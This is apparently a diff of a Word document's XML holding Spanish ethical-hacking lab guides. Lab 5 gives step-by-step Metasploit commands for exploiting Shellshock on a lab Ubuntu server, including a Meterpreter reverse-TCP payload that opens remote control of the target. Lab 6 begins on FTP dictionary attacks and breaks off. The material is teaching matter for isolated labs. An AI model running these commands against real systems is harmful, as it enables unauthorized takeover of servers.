-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Laboratorio 5</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Realización de la explotación de Shellshock en un servidor web y acceso sin restricciones al servidor</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Escenario</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>Para ser un hacker ético experto y un analizador de penetración, debe comprender cómo probar la arquitectura de seguridad de un sistema UNIX para protegerlo de ataques como Shellshock.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Objetivos de Laboratorio</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>Este laboratorio ayuda a los estudiantes a aprender cómo:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Prueba Ubuntu Server para Vulnerabilidad Bash</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Explorar la vulnerabilidad y ganar control sobre el sistema.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Entorno de Laboratorio</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>Para llevar a cabo el laboratorio, necesitas:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Una máquina virtual que ejecuta Ubuntu Server</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Una máquina virtual que ejecuta Kali Linux</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Descripción general de Shellshock</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>Shellshock a menudo se instala como la interfaz de línea de comandos predeterminada del sistema. En Unix y otros sistemas operativos que soporta Bash, cada programa en ejecución tiene su propia lista de pares nombre / valor denominados variables de entorno. Cuando un programa inicia otro programa, proporciona una lista inicial de variables de entorno para el nuevo programa.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Tareas de Laboratorio</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>1.</w:t>
-        <w:tab/>
-        <w:t>En este laboratorio, usaremos máquinas Kali Linux y Ubuntu Server. Antes de comenzar esta práctica de laboratorio, debe asegurarse de que ha iniciado las dos máquinas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rStyle w:val="InternetLink"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>2.</w:t>
-        <w:tab/>
-        <w:t xml:space="preserve">Inicie el navegador web Iceweasel e ingrese la URL </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="InternetLink"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>http://10.0.0.4/cgi-bin/shellshock</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>3.</w:t>
-        <w:tab/>
-        <w:t>Aparece una página web de shellshock, como se muestra en la siguiente captura de pantalla:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Nota: la dirección IP 10.0.0.4 mencionada en la URL se refiere a la máquina de Ubuntu. Esta dirección IP puede variar en su entorno de laboratorio.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>4.</w:t>
-        <w:tab/>
-        <w:t>Estarás usando esta URL para atacar la máquina de Ubuntu. Minimiza o cierra el navegador web.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>5.</w:t>
-        <w:tab/>
-        <w:t>Abra una consola de terminal navegando a Accesorios -&gt; Terminal</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Nota: también puede hacer clic (el icono del terminal) en la barra de menú para iniciar el terminal de línea de comandos.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>6.</w:t>
-        <w:tab/>
-        <w:t>Ingrese el comando de inicio de postgresql.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>7.</w:t>
-        <w:tab/>
-        <w:t>Entrar en el servicio de comando metasploit de inicio.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>8.</w:t>
-        <w:tab/>
-        <w:t>Ingrese el comando msfconsole</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>9.</w:t>
-        <w:tab/>
-        <w:t>Ingresar el comando:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>use exploit/multi/http/apache_mod_cgi_bash_env_exec.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>10.</w:t>
-        <w:tab/>
-        <w:t>Ingrese los siguientes comandos:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>set LHOST 10.0.0.7</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>set RHOST 10.0.0.4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>set TARGETURI /cgi-bin/shellshock</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>set payload linux/x86/meterpreter/reverse_tcp</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>LHOST se refiere a la dirección IP de la máquina atacante (Kali Linux) y RHOST se refiere a la dirección IP de la máquina de destino (Ubuntu). Ambas direcciones IP pueden variar en su entorno de laboratorio.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>11.</w:t>
-        <w:tab/>
-        <w:t>Has configurado todas las opciones requeridas para realizar la explotación.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>12.</w:t>
-        <w:tab/>
-        <w:t>Al emitir el comando explotar, el servidor Ubuntu (que aloja la página web de shellshock) estará instantáneamente y estará bajo el control de la máquina víctima.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>13.</w:t>
-        <w:tab/>
-        <w:t>Entrar en explotar</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>14.</w:t>
-        <w:tab/>
-        <w:t>Esto establece una sesión de meterpreter, como se muestra en la siguiente captura de pantalla:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>15.</w:t>
-        <w:tab/>
-        <w:t>Ahora puede ver los archivos y directorios ubicados en la máquina; borre, cargue y descargue archivos desde y hacia la máquina; Ejecutar aplicaciones de forma remota, listar los procesos; interactuar con esos procesos; lanzar un shell Reinicie o apague la máquina, etc.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>16.</w:t>
-        <w:tab/>
-        <w:t>Ingrese sysinfo. Esto muestra la información de la máquina víctima (Ubuntu), como se muestra en la siguiente captura de pantalla:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>17.</w:t>
-        <w:tab/>
-        <w:t>Introduce ayuda. Esto enumera todos los comandos que pueden emitirse a través de la consola de meterpreter, como se muestra en la siguiente captura de pantalla:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>18.</w:t>
-        <w:tab/>
-        <w:t>Puede utilizar cualquiera de estos comandos para realizar diversas actividades maliciosas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Analisis de Laboratorio</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>Documentar la salida</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Laboratorio 6</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Cracking FTP usando el ataque del diccionario de credenciales</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Escenario</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>En esta fase de piratería del servidor web, un atacante intenta descifrar las contraseñas del servidor web. Un atacante intenta todas las técnicas posibles de descifrado de contraseñas para extraer contraseñas, como adivinar con contraseña, ataques de diccionario, ataques de fuerza bruta, ataques híbridos, hashes precalculados, ataques basados en reglas, ataques de red distribuidos, ataques de arco iris, etc. , ya que algunas de estas técnicas son tediosas y requieren mucho tiempo. Un atacante también puede usar herramientas automatizadas como brutus, THC-Hydra, etc. para descifrar contraseñas web.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Objetivos de Laboratorio</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>El objetivo de este laboratorio es ayudar a los estudiantes a:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>a.</w:t>
-        <w:tab/>
-        <w:t>Realizar el escaneo de nmap para encontrar si un puerto ftp está abierto</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
